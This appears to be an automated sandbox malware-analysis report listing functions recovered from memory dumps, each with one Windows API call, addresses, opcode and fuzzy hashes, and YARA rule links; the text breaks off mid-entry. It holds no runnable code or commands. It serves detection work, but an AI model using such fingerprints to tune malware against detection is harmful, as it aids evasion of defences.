Uniqueness

Uniqueness Score: -1.00%

Function 1DEDA588, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DEDA617

Strings

s, xrefs: 1DEDA5AF

Memory Dump Source

Source File: 0000000A.00000002.219015117566.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID: s
API String ID: 3793708945-453955339
Opcode ID: 8d5f70663d8ec66744ecb9cb8ec4cf6b543770f8e57a40d3f1709679603544da
Instruction ID: 42c1e1a8724e4ed5a5234e4bcbe927f200761d384b38c8ea76f80f722bbadcde
Opcode Fuzzy Hash: 8d5f70663d8ec66744ecb9cb8ec4cf6b543770f8e57a40d3f1709679603544da
Instruction Fuzzy Hash: E12135B5C002489FDB00CFAAD484ADEBFF8EF48310F14845AE954A3311C778AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1DEDA590, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DEDA617

Strings

s, xrefs: 1DEDA5AF

Memory Dump Source

Source File: 0000000A.00000002.219015117566.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID: s
API String ID: 3793708945-453955339
Opcode ID: 824540e14c9e13a4d4983a13d1089f2114a1a9626c0852d6e99105ac8b07a9e5
Instruction ID: 676b6c0daeb9937ac0489d03ebc5032bec46890e1e7cf3de644be7f5f43318cb
Opcode Fuzzy Hash: 824540e14c9e13a4d4983a13d1089f2114a1a9626c0852d6e99105ac8b07a9e5
Instruction Fuzzy Hash: 2421E4B5D00208DFDB00CFAAD984AEEBBF8EF48310F10841AE914A7350C778A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 014CD4DC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 014CF906

Strings

s, xrefs: 014CF8B2

Memory Dump Source

Source File: 0000000A.00000002.219006841322.00000000014C0000.00000040.00000010.sdmp, Offset: 014C0000, based on PE: false

Similarity

API ID: FindWindow
String ID: s
API String ID: 134000473-453955339
Opcode ID: bc4cd7369b3e69b5c32413b4df6a9dd7ad54eeded937956c00f0d4aabcf6603e
Instruction ID: cc789790f3e8b7d9588edb8da88a22e413380e1541838f484253db12d6dc4659
Opcode Fuzzy Hash: bc4cd7369b3e69b5c32413b4df6a9dd7ad54eeded937956c00f0d4aabcf6603e
Instruction Fuzzy Hash: D62110B9D002099FDB10CF9AC884ADEFBF5BF89610F10852ED519B7610C378A508CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BA27B1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,00BA2791,00000800), ref: 00BA2822

Strings

s, xrefs: 00BA27D7

Memory Dump Source

Source File: 0000000A.00000002.219003785163.0000000000BA0000.00000040.00000010.sdmp, Offset: 00BA0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: s
API String ID: 1029625771-453955339
Opcode ID: f61aaf1e5615770c0f8efafbd4d1e213aa93207cc4fa0c0a500c15ab6ed0fcf1
Instruction ID: 7e80e6a74310a7b604560971bc3f603a1b07d9f22128054d4070859663bbb923
Opcode Fuzzy Hash: f61aaf1e5615770c0f8efafbd4d1e213aa93207cc4fa0c0a500c15ab6ed0fcf1
Instruction Fuzzy Hash: A121F2B6C002099FDB14CF9AD444AEEBBF4EF99310F10842AE919A7600C379A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 014C05B4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,014C9F6A), ref: 014CA057

Strings

s, xrefs: 014CA00F

Memory Dump Source

Source File: 0000000A.00000002.219006841322.00000000014C0000.00000040.00000010.sdmp, Offset: 014C0000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID: s
API String ID: 1890195054-453955339
Opcode ID: 6405886de0ede5039264e7757d0920802470e7818fbc1b09d27b440f76f5f933
Instruction ID: 7f14100beea5c5124ffe830d5d518debf56494c559c2e098849930f5ee027758
Opcode Fuzzy Hash: 6405886de0ede5039264e7757d0920802470e7818fbc1b09d27b440f76f5f933
Instruction Fuzzy Hash: D61117B1C006199BDB10CF9AC5487EEFBF4AF48714F14852AD914B7250D778A944CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 014CF888, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 014CF906

Strings

s, xrefs: 014CF8B2

Memory Dump Source

Source File: 0000000A.00000002.219006841322.00000000014C0000.00000040.00000010.sdmp, Offset: 014C0000, based on PE: false

Similarity

API ID: FindWindow
String ID: s
API String ID: 134000473-453955339
Opcode ID: 33b8f63a02d7873bb4444527a754a03c334af3b97674cf04187721304175f9f1
Instruction ID: f0c668c8c4d0437c1f64e6158d1b8523744fc40cb2550b40b328111ca6f06141
Opcode Fuzzy Hash: 33b8f63a02d7873bb4444527a754a03c334af3b97674cf04187721304175f9f1
Instruction Fuzzy Hash: 0B2130B9C002099FDB10CF9AC484ADEFBF4FF88210F10842ED519B7210C378A508CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 014C9FE8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,014C9F6A), ref: 014CA057

Strings

s, xrefs: 014CA00F

Memory Dump Source

Source File: 0000000A.00000002.219006841322.00000000014C0000.00000040.00000010.sdmp, Offset: 014C0000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID: s
API String ID: 1890195054-453955339
Opcode ID: 4cf9b38363ba8d361e7ec68590c708a18703d645039f2a6d15ecb96715f2ee07
Instruction ID: 34d48c42a6af070d96e3ed4b7e6b72b278e737d2a08a98687b2f6cc669967592
Opcode Fuzzy Hash: 4cf9b38363ba8d361e7ec68590c708a18703d645039f2a6d15ecb96715f2ee07
Instruction Fuzzy Hash: FE2133B1C006199FCB10CF9AC548BEEFBF4AF88324F15852AD918B7250D378A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 1DED3810, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1DED53F6

Strings

s, xrefs: 1DED53AF

Memory Dump Source

Source File: 0000000A.00000002.219015117566.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Similarity

API ID: HandleModule
String ID: s
API String ID: 4139908857-453955339
Opcode ID: b3de840c9e41dcf6c497c3473cba086ef34fd71d5b2500b9a6d9932abde3f639
Instruction ID: 518c2c933fda336fea40014a7b4402a91b4d9d4d3fc79b15f1b40d3c49bc8c6f
Opcode Fuzzy Hash: b3de840c9e41dcf6c497c3473cba086ef34fd71d5b2500b9a6d9932abde3f639
Instruction Fuzzy Hash: 6011F0B5C007498FDB10CF9AC444BAEFBF8AF89215F10842AD519B7250C7B5A546CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00BA5888, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00BA6745

Strings

s, xrefs: 00BA670A

Memory Dump Source

Source File: 0000000A.00000002.219003785163.0000000000BA0000.00000040.00000010.sdmp, Offset: 00BA0000, based on PE: false

Similarity

API ID: Initialize
String ID: s
API String ID: 2538663250-453955339
Opcode ID: caeac65b6734fa41327888d3c6f7dde7e06f88690a1076a1d6d0c7eeb15baa81
Instruction ID: 2bbb109d0328b46df919474c4a2ea8f3dfb0fdabb31cbc8f46953730103c59a3
Opcode Fuzzy Hash: caeac65b6734fa41327888d3c6f7dde7e06f88690a1076a1d6d0c7eeb15baa81
Instruction Fuzzy Hash: 751145B0C042488FCB10CF99C488BDEBBF8EF49324F24845AD618A7200C3B8A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BA66E8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00BA6745

Strings

s, xrefs: 00BA670A

Memory Dump Source

Source File: 0000000A.00000002.219003785163.0000000000BA0000.00000040.00000010.sdmp, Offset: 00BA0000, based on PE: false

Similarity

API ID: Initialize
String ID: s
API String ID: 2538663250-453955339
Opcode ID: 1870f8a0abbdad0baa30960879a647de793e8c378ca5229e999581a9bbe97334
Instruction ID: 0434b4ce180d1c1e08e38bf9b65844c5948312451796c0c09ffcaff1becf69ed
Opcode Fuzzy Hash: 1870f8a0abbdad0baa30960879a647de793e8c378ca5229e999581a9bbe97334
Instruction Fuzzy Hash: FE1118B5D006498FDB10CF99D988BDEBBF4EF49324F148459D518A7710C378A948CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E46EC1, Relevance: 2.1, APIs: 1, Instructions: 629libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d2473e2d8b4d5f5781a637cceb3e606fe0f11989189010498f8d41f8a488433
Instruction ID: d845ffdf27716ab8c32dc541b691b79ed87cd5858cd1128ba7482335b4d8ec85
Opcode Fuzzy Hash: 4d2473e2d8b4d5f5781a637cceb3e606fe0f11989189010498f8d41f8a488433
Instruction Fuzzy Hash: E0521774A05228CFCB68DF70D888799B7B6BF48305F2081EAD54AA3744DB349E85DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E46EFD, Relevance: 2.1, APIs: 1, Instructions: 622libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 010aa1a93a546efe8f3724bdcce11aff776a11de0cdb424d0addacafb16e5c63
Instruction ID: f78b0ec329cb8df07aaf43b1a632f303ec60b08166fd8a72a665b10295f05109
Opcode Fuzzy Hash: 010aa1a93a546efe8f3724bdcce11aff776a11de0cdb424d0addacafb16e5c63
Instruction Fuzzy Hash: A7521774A05228CFCB68DF70D888799B7B6BF48305F2081EAD549A3744DB349E85DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E46F39, Relevance: 2.1, APIs: 1, Instructions: 617libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b2bd14a6abe3cef7818c88242b3b277544e12e1f793a0c6dd03cd0ba107644e9
Instruction ID: c4b8308ddba3752d2d974fe6b3c252f61dba9c5d89d4f62ef61e4c0d99af0b0c
Opcode Fuzzy Hash: b2bd14a6abe3cef7818c88242b3b277544e12e1f793a0c6dd03cd0ba107644e9
Instruction Fuzzy Hash: 29520774A05228CFCB64DF70D888799B7B6BF48305F2081EAD549A3754EB349E85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E46F7E, Relevance: 2.1, APIs: 1, Instructions: 610libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f10c1cb88d5cb20b008278727023c467eeb2e844c1338d5bbf3f2adc54a0a2f
Instruction ID: a70705ca7824a4aceeaa92f05aa4e8d888be62b370f8863828b1a0a719b56a96
Opcode Fuzzy Hash: 4f10c1cb88d5cb20b008278727023c467eeb2e844c1338d5bbf3f2adc54a0a2f
Instruction Fuzzy Hash: BB520774A05228CFCB68DF70D888799B7B6BF48305F2081EAD549A3744EB349E85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E46FC3, Relevance: 2.1, APIs: 1, Instructions: 603libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 106bc2c39d29eb4c9b7ab447a4ce07cc4179ea9d4c43bf6ba6c63b6f8e8d13da
Instruction ID: 3eb6167ee0e51f96adb314220bfbdd7f3797bc0ea685f6db7a1178f8c6672b41
Opcode Fuzzy Hash: 106bc2c39d29eb4c9b7ab447a4ce07cc4179ea9d4c43bf6ba6c63b6f8e8d13da
Instruction Fuzzy Hash: C8520774A05228CFCB68DF70D888799B7B6BF48305F2081EAD549A3744EB349E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00E47008, Relevance: 2.1, APIs: 1, Instructions: 596libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fde2b4d57ffcc0f870006c7969ae9e147f68cd15b3021bab850a6ed65359b901
Instruction ID: 72eb7578e4d5e60f9b0c944988f9f2173cbfb13798f4e904980c0a8944a7ad9e
Opcode Fuzzy Hash: fde2b4d57ffcc0f870006c7969ae9e147f68cd15b3021bab850a6ed65359b901
Instruction Fuzzy Hash: 54520674A05228CFCB649F70D88879DB7B6BF48305F2081EAD54AA3744EB349E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00E4704D, Relevance: 2.1, APIs: 1, Instructions: 589libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b44955aa794af88fab60c55470a39e7de03abace7ff58017a48b76a72a472d27
Instruction ID: 3195152090c4c595a17d7396b7c51af7c59710b82fbac26fc5aeeb3958f7c915
Opcode Fuzzy Hash: b44955aa794af88fab60c55470a39e7de03abace7ff58017a48b76a72a472d27
Instruction Fuzzy Hash: 71520674A05228CFCB649F70C88879DB7B6BF48305F2081EAD549A3754EB349E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00E47092, Relevance: 2.1, APIs: 1, Instructions: 582libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3371c8c68707c072cb2dce24ceddd0e65bcc40ceb97541a78a6b25c818a4e764
Instruction ID: 875ac69a338380d7bfe817bfce7c199d992691e68ff335ada99722fb4799f909
Opcode Fuzzy Hash: 3371c8c68707c072cb2dce24ceddd0e65bcc40ceb97541a78a6b25c818a4e764
Instruction Fuzzy Hash: 58520674A05228CFCB649F70D88879DB7B6BF48305F2081EAD54AA3744EB349E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00E470D7, Relevance: 2.1, APIs: 1, Instructions: 573libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b3cabe9307d0edc4be6edc242785aff4477a1cd330e09385223d170810d523e
Instruction ID: 52e376b4fe1172abd2bc2ee1f6c2b412fd94cea0e92d3f08f7de90aeca71677d
Opcode Fuzzy Hash: 1b3cabe9307d0edc4be6edc242785aff4477a1cd330e09385223d170810d523e
Instruction Fuzzy Hash: CA420774A05228CFCB649F70D88879DB7B6BF48305F2081EAD54AA3744EB349E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00E47113, Relevance: 2.1, APIs: 1, Instructions: 568libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ebbe36756c479921c2cb7b4e9a180538c240b8cf9d56bfd6ffcc4fa17ff4a36
Instruction ID: 63d4c42618757351b8529c5aa849992bdcf363552ae1bd1afe2e6adc806af7e1
Opcode Fuzzy Hash: 6ebbe36756c479921c2cb7b4e9a180538c240b8cf9d56bfd6ffcc4fa17ff4a36
Instruction Fuzzy Hash: C7420674A05228CFCB649F74D88879DB7B6BF48305F2081EAD50AA3744EB349E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00E47158, Relevance: 2.1, APIs: 1, Instructions: 561libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 09b8a08adda4ba376afb0ba199720f9802a81825d766711c41ca009fec7225b3
Instruction ID: beb552cd4ed0b99c129defd5725d6fc7cc4b9ea18027a95b971d4c6a1e044c59
Opcode Fuzzy Hash: 09b8a08adda4ba376afb0ba199720f9802a81825d766711c41ca009fec7225b3
Instruction Fuzzy Hash: 53420674A05228CFCB649F74C88879DB7B6BF48305F2081EAD50AA3754EB349E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00E4719D, Relevance: 2.1, APIs: 1, Instructions: 554libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c268cc9bda9bfa2d27b32a1cd61c6cb7a0aca318860ccdf387e63ea6cfdaf59
Instruction ID: da694d67ceeea1fa9ab882d9931d53e1356fb6b22aa1df03dc6c00669597de21
Opcode Fuzzy Hash: 9c268cc9bda9bfa2d27b32a1cd61c6cb7a0aca318860ccdf387e63ea6cfdaf59
Instruction Fuzzy Hash: FA420674A05228CFCB649F74C88879DB7B6BF48305F2081EAD50AA3744EB349E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00E471F8, Relevance: 2.0, APIs: 1, Instructions: 543libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed93803adb94f89c3432a666137e50b17668eba2dd17b0d7b066182214153547
Instruction ID: 437209875d382a3655bf25cc0e44bc49739725b1425571942ce3d1cc5824344b
Opcode Fuzzy Hash: ed93803adb94f89c3432a666137e50b17668eba2dd17b0d7b066182214153547
Instruction Fuzzy Hash: 09420674A05228CFCB649F70D88879DB7B6BF48305F2081EAD50AA3754EB349E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00E4723D, Relevance: 2.0, APIs: 1, Instructions: 536libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 816688d04b0891de1b37dae593bb16fd8de04fb7c7aee62d0f80f0303d49955e
Instruction ID: 739b3f1fbf982bb6fb0dfea1c9a4b20a644f80915c7ef95e16ca0612ba3db895
Opcode Fuzzy Hash: 816688d04b0891de1b37dae593bb16fd8de04fb7c7aee62d0f80f0303d49955e
Instruction Fuzzy Hash: 29420674A05228CFCB649F74D88879DB7B6BF48305F2081EAD50AA3744EB349E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00E47282, Relevance: 2.0, APIs: 1, Instructions: 529libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0f8d8f3df52d0b95ac50a933e8db097caf3d219b5b32648172c87a2ce55bfe2
Instruction ID: 3559987df7ecebe23dd58492b4d8518e4e14a87b497252997b1c21ef88b5060c
Opcode Fuzzy Hash: c0f8d8f3df52d0b95ac50a933e8db097caf3d219b5b32648172c87a2ce55bfe2
Instruction Fuzzy Hash: 1032F674A05228CFCB649F74D88879DB7B6BF48305F2081EAD50AA3754EB349E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00E472C7, Relevance: 2.0, APIs: 1, Instructions: 522libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f0870a7bd092e218f5c4abc6655057e5619772c740c1a1da3bf8aba67e4d496
Instruction ID: 21edb5f9fb9a5a3e43a84e25194359d39a99b3151ab6535aaf0dd6368582bbd5
Opcode Fuzzy Hash: 6f0870a7bd092e218f5c4abc6655057e5619772c740c1a1da3bf8aba67e4d496
Instruction Fuzzy Hash: BD32F674A05228CFCB649F74D88879DB7B6BF48305F2081EAD50AA3754EB349E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00E4730C, Relevance: 2.0, APIs: 1, Instructions: 515libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bfb81293e8fec3efbcfd296ab83b350fca269808e587b4541ac8b41147debdad
Instruction ID: e8583e0e1a561839d0bdf6f25eaca7d7da05e7ae5bdc67ff273f0b9f35b4a484
Opcode Fuzzy Hash: bfb81293e8fec3efbcfd296ab83b350fca269808e587b4541ac8b41147debdad
Instruction Fuzzy Hash: 3132F774A05228CFCB649F74D88879DB7B6BF48305F2081EAD50AA3754EB349E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00E47351, Relevance: 2.0, APIs: 1, Instructions: 508libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb6daba92610da316025839ea72fcb8d8617bd9ad30b1c6f2bd906cb5a691e24
Instruction ID: b564592bb0cdd96620f69643c7db4b2b322b65ceafb13c9119f88718be351c58
Opcode Fuzzy Hash: eb6daba92610da316025839ea72fcb8d8617bd9ad30b1c6f2bd906cb5a691e24
Instruction Fuzzy Hash: C832F774A05228CFCB649F74D88879DB7B6BF48305F2081EAD509A3754EB349E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00E47396, Relevance: 2.0, APIs: 1, Instructions: 501libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e7205ed8643ccf9a1ff344802dc8f631fdccc21f3f48ee93030459f2e2d43544
Instruction ID: 6f8b85de3f8d8ca21cc9c35e2187c6336b3aa3cd74ae5297268824e59f1b9594
Opcode Fuzzy Hash: e7205ed8643ccf9a1ff344802dc8f631fdccc21f3f48ee93030459f2e2d43544
Instruction Fuzzy Hash: E532F774A05228CFCB649F74D88879DB7B6BF88305F2081EAD509A3754EB349E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00E473DB, Relevance: 2.0, APIs: 1, Instructions: 494libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14f8b3e9b8751f64b26774a9bd81bd84c2fbfe2b57ea7ae63faa39586afbe6bf
Instruction ID: 46b8741fe5bfb5be9167f3b170da185ef7ad67c3fb1ce5935ba5517eef3fb35a
Opcode Fuzzy Hash: 14f8b3e9b8751f64b26774a9bd81bd84c2fbfe2b57ea7ae63faa39586afbe6bf
Instruction Fuzzy Hash: 2932F774A052288FCB64DF74D88879DB7B6BF88305F2081EAD509A3754EB349E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00E47420, Relevance: 2.0, APIs: 1, Instructions: 487libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ac7d217cad640857bd7d5a245220d7e6880cd0988a3f3c612d58252af11b741
Instruction ID: eff9d954ca7ba70dbe3c56aec01679ac02037d9d625b167a490df64f367651de
Opcode Fuzzy Hash: 3ac7d217cad640857bd7d5a245220d7e6880cd0988a3f3c612d58252af11b741
Instruction Fuzzy Hash: 4C22F874A052288FCB64DF74D88879DB7B6BF88305F2081EAD509A3754EB349E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00E47465, Relevance: 2.0, APIs: 1, Instructions: 478libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ae4ed5f9a5ecd123db2cde236968b1e2d2f55d4755fa91c018f585ecc42456d
Instruction ID: 61b47de4f0c55d1f56701d1472ae4558ac1ddf6239f1a9942070a4b0e035d28e
Opcode Fuzzy Hash: 2ae4ed5f9a5ecd123db2cde236968b1e2d2f55d4755fa91c018f585ecc42456d
Instruction Fuzzy Hash: DA220974A052288FCB64DF74D88879DB7B6BF88305F2081EAD509A3744EB349E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00E474A1, Relevance: 2.0, APIs: 1, Instructions: 473libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d3f429e468e7af1524462b571e5c6a4ac31fbb304304468881f862cdc3c09e3
Instruction ID: 15eafeb3dec03e5f7f50c3256c24576331ba02099b55a3cf5cf7d3370f19154c
Opcode Fuzzy Hash: 6d3f429e468e7af1524462b571e5c6a4ac31fbb304304468881f862cdc3c09e3
Instruction Fuzzy Hash: 66220974A052288FCB64DF74D88879DB7B6BF88305F2081EAD509A3754EB349E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00E474E6, Relevance: 2.0, APIs: 1, Instructions: 464libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 27bab3a2ecea376769945b4e7279d129f33cd345f05f3eaccf40ad2bb41f51ec
Instruction ID: 0ed75afeaa9be7ca839bb233f0b7e2190d885d6c5d898afa7749f78dcb92c8dd
Opcode Fuzzy Hash: 27bab3a2ecea376769945b4e7279d129f33cd345f05f3eaccf40ad2bb41f51ec
Instruction Fuzzy Hash: 30220974A052288FCB64DF74D88879DB7B6BF88305F2085EAD509A3744EB349E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00E47522, Relevance: 2.0, APIs: 1, Instructions: 459libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

